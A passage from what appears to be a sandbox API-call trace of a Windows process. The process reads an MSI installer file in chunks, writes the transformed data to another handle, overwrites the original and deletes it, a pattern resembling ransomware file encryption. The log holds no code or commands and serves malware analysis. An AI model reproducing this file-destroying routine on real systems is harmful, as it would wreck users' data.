lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0078.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d4d0 [0078.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x6d4d0, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 39 [0078.903] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0078.903] GetFileType (hFile=0x42c) returned 0x1 [0078.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0078.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a630 [0078.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0078.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0078.903] GetLastError () returned 0x0 [0078.903] SetLastError (dwErrCode=0x0) [0078.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0078.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0078.903] GetLastError () returned 0x0 [0078.903] SetLastError (dwErrCode=0x0) [0078.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0078.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0078.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0078.903] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0078.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0078.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0078.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x93678 [0078.905] GetLastError () returned 0x0 [0078.905] SetLastError (dwErrCode=0x0) [0078.905] GetLastError () returned 0x0 [0078.905] SetLastError (dwErrCode=0x0) [0078.906] GetLastError () returned 0x0 [0078.906] SetLastError (dwErrCode=0x0) [0078.906] GetLastError () returned 0x0 [0078.906] SetLastError (dwErrCode=0x0) [0078.906] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.907] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.907] GetLastError () returned 0x0 [0078.907] SetLastError (dwErrCode=0x0) [0078.908] GetLastError () returned 0x0 [0078.908] SetLastError (dwErrCode=0x0) [0078.908] GetLastError () returned 0x0 [0078.908] SetLastError (dwErrCode=0x0) [0078.908] GetLastError () returned 0x0 [0078.908] SetLastError (dwErrCode=0x0) [0078.908] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.908] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.908] GetLastError () returned 0x0 [0078.908] SetLastError (dwErrCode=0x0) [0078.908] GetLastError () returned 0x0 [0078.908] SetLastError (dwErrCode=0x0) [0078.909] GetLastError () returned 0x0 [0078.909] SetLastError (dwErrCode=0x0) [0078.909] GetLastError () returned 0x0 [0078.909] SetLastError (dwErrCode=0x0) [0078.909] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.909] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.909] GetLastError () returned 0x0 [0078.909] SetLastError (dwErrCode=0x0) [0078.909] GetLastError () returned 0x0 [0078.909] SetLastError (dwErrCode=0x0) [0078.909] GetLastError () returned 0x0 [0078.909] SetLastError (dwErrCode=0x0) [0078.910] GetLastError () returned 0x0 [0078.910] SetLastError (dwErrCode=0x0) [0078.910] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.910] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.910] GetLastError () returned 0x0 [0078.910] SetLastError (dwErrCode=0x0) [0078.910] GetLastError () returned 0x0 [0078.910] SetLastError (dwErrCode=0x0) [0078.910] GetLastError () returned 0x0 [0078.910] SetLastError (dwErrCode=0x0) [0078.910] GetLastError () returned 0x0 [0078.910] SetLastError (dwErrCode=0x0) [0078.911] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.911] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.911] GetLastError () returned 0x0 [0078.911] SetLastError (dwErrCode=0x0) [0078.911] GetLastError () returned 0x0 [0078.911] SetLastError (dwErrCode=0x0) [0078.911] GetLastError () returned 0x0 [0078.911] SetLastError (dwErrCode=0x0) [0078.911] GetLastError () returned 0x0 [0078.911] SetLastError (dwErrCode=0x0) [0078.911] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.912] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.912] GetLastError () returned 0x0 [0078.912] SetLastError (dwErrCode=0x0) [0078.912] GetLastError () returned 0x0 [0078.912] SetLastError (dwErrCode=0x0) [0078.912] GetLastError () returned 0x0 [0078.912] SetLastError (dwErrCode=0x0) [0078.912] GetLastError () returned 0x0 [0078.912] SetLastError (dwErrCode=0x0) [0078.912] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.912] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.913] GetLastError () returned 0x0 [0078.913] SetLastError (dwErrCode=0x0) [0078.913] GetLastError () returned 0x0 [0078.913] SetLastError (dwErrCode=0x0) [0078.913] GetLastError () returned 0x0 [0078.913] SetLastError (dwErrCode=0x0) [0078.913] GetLastError () returned 0x0 [0078.913] SetLastError (dwErrCode=0x0) [0078.913] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.913] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.913] GetLastError () returned 0x0 [0078.913] SetLastError (dwErrCode=0x0) [0078.914] GetLastError () returned 0x0 [0078.914] SetLastError (dwErrCode=0x0) [0078.914] GetLastError () returned 0x0 [0078.914] SetLastError (dwErrCode=0x0) [0078.914] GetLastError () returned 0x0 [0078.914] SetLastError (dwErrCode=0x0) [0078.914] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.914] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.914] GetLastError () returned 0x0 [0078.914] SetLastError (dwErrCode=0x0) [0078.914] GetLastError () returned 0x0 [0078.914] SetLastError (dwErrCode=0x0) [0078.915] GetLastError () returned 0x0 [0078.915] SetLastError (dwErrCode=0x0) [0078.915] GetLastError () returned 0x0 [0078.915] SetLastError (dwErrCode=0x0) [0078.915] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.915] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.915] GetLastError () returned 0x0 [0078.915] SetLastError (dwErrCode=0x0) [0078.915] GetLastError () returned 0x0 [0078.915] SetLastError (dwErrCode=0x0) [0078.915] GetLastError () returned 0x0 [0078.915] SetLastError (dwErrCode=0x0) [0078.916] GetLastError () returned 0x0 [0078.916] SetLastError (dwErrCode=0x0) [0078.916] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.916] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.916] GetLastError () returned 0x0 [0078.916] SetLastError (dwErrCode=0x0) [0078.916] GetLastError () returned 0x0 [0078.916] SetLastError (dwErrCode=0x0) [0078.916] GetLastError () returned 0x0 [0078.916] SetLastError (dwErrCode=0x0) [0078.916] GetLastError () returned 0x0 [0078.916] SetLastError (dwErrCode=0x0) [0078.917] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.917] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.917] GetLastError () returned 0x0 [0078.917] SetLastError (dwErrCode=0x0) [0078.917] GetLastError () returned 0x0 [0078.917] SetLastError (dwErrCode=0x0) [0078.917] GetLastError () returned 0x0 [0078.917] SetLastError (dwErrCode=0x0) [0078.917] GetLastError () returned 0x0 [0078.917] SetLastError (dwErrCode=0x0) [0078.917] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.918] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.918] GetLastError () returned 0x0 [0078.918] SetLastError (dwErrCode=0x0) [0078.918] GetLastError () returned 0x0 [0078.918] SetLastError (dwErrCode=0x0) [0078.918] GetLastError () returned 0x0 [0078.918] SetLastError (dwErrCode=0x0) [0078.918] GetLastError () returned 0x0 [0078.918] SetLastError (dwErrCode=0x0) [0078.918] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.918] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.919] GetLastError () returned 0x0 [0078.919] SetLastError (dwErrCode=0x0) [0078.919] GetLastError () returned 0x0 [0078.919] SetLastError (dwErrCode=0x0) [0078.919] GetLastError () returned 0x0 [0078.919] SetLastError (dwErrCode=0x0) [0078.919] GetLastError () returned 0x0 [0078.919] SetLastError (dwErrCode=0x0) [0078.919] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.919] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.919] GetLastError () returned 0x0 [0078.920] SetLastError (dwErrCode=0x0) [0078.920] GetLastError () returned 0x0 [0078.920] SetLastError (dwErrCode=0x0) [0078.920] GetLastError () returned 0x0 [0078.920] SetLastError (dwErrCode=0x0) [0078.920] GetLastError () returned 0x0 [0078.920] SetLastError (dwErrCode=0x0) [0078.920] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.920] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.920] GetLastError () returned 0x0 [0078.920] SetLastError (dwErrCode=0x0) [0078.921] GetLastError () returned 0x0 [0078.921] SetLastError (dwErrCode=0x0) [0078.921] GetLastError () returned 0x0 [0078.921] SetLastError (dwErrCode=0x0) [0078.921] GetLastError () returned 0x0 [0078.921] SetLastError (dwErrCode=0x0) [0078.921] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.921] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.921] GetLastError () returned 0x0 [0078.921] SetLastError (dwErrCode=0x0) [0078.921] GetLastError () returned 0x0 [0078.921] SetLastError (dwErrCode=0x0) [0078.922] GetLastError () returned 0x0 [0078.922] SetLastError (dwErrCode=0x0) [0078.922] GetLastError () returned 0x0 [0078.922] SetLastError (dwErrCode=0x0) [0078.922] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.922] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.922] GetLastError () returned 0x0 [0078.922] SetLastError (dwErrCode=0x0) [0078.922] GetLastError () returned 0x0 [0078.922] SetLastError (dwErrCode=0x0) [0078.922] GetLastError () returned 0x0 [0078.922] SetLastError (dwErrCode=0x0) [0078.923] GetLastError () returned 0x0 [0078.923] SetLastError (dwErrCode=0x0) [0078.923] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.923] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.923] GetLastError () returned 0x0 [0078.923] SetLastError (dwErrCode=0x0) [0078.923] GetLastError () returned 0x0 [0078.923] SetLastError (dwErrCode=0x0) [0078.923] GetLastError () returned 0x0 [0078.923] SetLastError (dwErrCode=0x0) [0078.923] GetLastError () returned 0x0 [0078.923] SetLastError (dwErrCode=0x0) [0078.924] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.924] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.924] GetLastError () returned 0x0 [0078.924] SetLastError (dwErrCode=0x0) [0078.924] GetLastError () returned 0x0 [0078.924] SetLastError (dwErrCode=0x0) [0078.924] GetLastError () returned 0x0 [0078.924] SetLastError (dwErrCode=0x0) [0078.924] GetLastError () returned 0x0 [0078.924] SetLastError (dwErrCode=0x0) [0078.924] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.925] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.925] GetLastError () returned 0x0 [0078.925] SetLastError (dwErrCode=0x0) [0078.925] GetLastError () returned 0x0 [0078.925] SetLastError (dwErrCode=0x0) [0078.925] GetLastError () returned 0x0 [0078.925] SetLastError (dwErrCode=0x0) [0078.925] GetLastError () returned 0x0 [0078.925] SetLastError (dwErrCode=0x0) [0078.925] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.925] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.926] GetLastError () returned 0x0 [0078.926] SetLastError (dwErrCode=0x0) [0078.926] GetLastError () returned 0x0 [0078.926] SetLastError (dwErrCode=0x0) [0078.926] GetLastError () returned 0x0 [0078.926] SetLastError (dwErrCode=0x0) [0078.926] GetLastError () returned 0x0 [0078.926] SetLastError (dwErrCode=0x0) [0078.926] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x200, lpOverlapped=0x0) returned 1 [0078.926] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0078.926] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.927] GetLastError () returned 0x0 [0078.927] SetLastError (dwErrCode=0x0) [0078.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0078.927] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327ef70*=0x200, lpOverlapped=0x0) returned 1 [0078.927] GetLastError () returned 0x0 [0078.927] SetLastError (dwErrCode=0x0) [0078.927] GetLastError () returned 0x0 [0078.927] SetLastError (dwErrCode=0x0) [0078.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0078.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0078.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0078.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0078.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x93678 | out: hHeap=0x20000) returned 1 [0078.927] CloseHandle (hObject=0x428) returned 1 [0078.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0078.930] CloseHandle (hObject=0x42c) returned 1 [0078.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0078.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0078.931] AreFileApisANSI () returned 1 [0078.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0078.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6cd98 [0078.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x6cd98, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 39 [0079.150] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0079.162] GetFileType (hFile=0x42c) returned 0x1 [0079.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0079.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0079.163] GetLastError () returned 0xb7 [0079.163] SetLastError (dwErrCode=0xb7) [0079.163] WriteFile (in: hFile=0x42c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0079.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0079.164] CloseHandle (hObject=0x42c) returned 1 [0079.164] AreFileApisANSI () returned 1 [0079.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0079.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d1b8 [0079.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x6d1b8, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 39 [0079.164] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi")) returned 1 [0079.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0079.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0079.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0079.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0079.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0079.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0079.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0079.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0079.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d780 | out: hHeap=0x20000) returned 1 [0079.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 